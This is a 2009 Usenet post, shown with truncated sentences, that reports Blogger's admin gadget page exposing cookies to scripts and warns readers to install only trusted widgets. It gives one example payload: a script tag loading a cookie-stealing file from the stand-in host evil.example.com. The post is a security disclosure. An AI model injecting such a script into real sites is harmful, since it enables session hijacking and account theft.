The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 |
From: David Turner
Date: Thu, 7 May 2009 17:12:40 -0700 (PDT)
Local: Thurs, May 7 2009 8:12 pm
Subject: Gadgets can steal cookes on admin page
Blogger cookies are usually marked with HttpOnly, so that they can't
be stolen by gadgets. This is a good thing. An exception seems to be in the admin interface. If you go to Layout/Page Elements, and click "Add a Gadget" and "HTML/Javascript", and enter <script src="http:// evil.example.com/stealcookies.js"></script>, that script will have access to document.cookie. I don't know if the cookies this can access are sufficient to do any
This is not a simple attack -- it would probably require creating a
I wish there were a non-public place to report security issues, but I
In short: Only install widgets created by people you trust not to
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
| |||||||||||||